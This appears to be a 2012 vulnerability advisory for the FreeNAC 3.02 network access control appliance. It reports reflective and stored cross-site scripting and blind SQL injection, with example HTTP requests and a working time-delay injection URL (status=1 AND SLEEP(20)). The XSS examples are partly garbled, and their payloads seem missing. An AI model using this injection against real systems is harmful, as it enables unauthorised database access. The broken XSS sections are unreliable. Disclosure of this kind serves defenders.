FreeNAC version 3.02 SQL Injection and XSS Vulnerabilties Date: May 19, 2012 Author: Blake Software Link: http://sourceforge.net/project/showfiles.php?group_id=170004 Version: 3.02 Tested on: Ubuntu 8.04 (freenac version 3.02 vmware appliance) FreeNAC FreeNAC provides Virtual LAN assignment, LAN access control (for all kinds of network devices such as Servers, Workstations, Printers, IP-Phones ..), live network end-device discovery.Both 802.1x and Cisco's VMPS port security modes are supported. VLAN, switch port management and documentation of Patch cabling is also included. ========================================================================================================================================== Reflective Cross-Site Scripting: Multiple parameters are vulnerable to reflective cross-site scripting. Affected Parameters: comment mac graphtype type name Example Request: GET /stats.php?graphtype=bar&type=vlan13 HTTP/1.1 Host: 192.168.1.118 User-Agent: Mozilla/5.0 (Windows NT 5.1; rv:12.0) Gecko/20100101 Firefox/12.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip, deflate DNT: 1 Proxy-Connection: keep-alive Referer: http://192.168.1.118/stats.php?graphtype=bar&type=switch Cookie: freenac=92bcf3d911d94e33106c2e79745e8e8e Example Response: HTTP/1.1 200 OK Date: Sat, 19 May 2012 17:42:41 GMT Server: Apache/2.2.8 (Ubuntu) PHP/5.2.4-2ubuntu5 with Suhosin-Patch X-Powered-By: PHP/5.2.4-2ubuntu5 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Content-Length: 5676 Content-Type: text/html
Database error
Please go back to the previous screen, or the Main Menu and start again, or try again later.
========================================================================================================================================== Stored Cross-Site Scripting: The comment parameter is vulnerable to stored cross-site scripting. Example Request:Administrative information | ||
Inventory: | ||
Classification: ............snip.................... ========================================================================================================================================== SQL Injection: The status parameter is vulnerable to blind SQL Injection. Injecting a time-delay of 20 seconds: http://192.168.1.118/deviceadd.php?name=test&mac=0001.0001.0001&status=1+AND+SLEEP(20)&vlan=6&username=2&office=1&comment=&action=Update&action_idx=1 |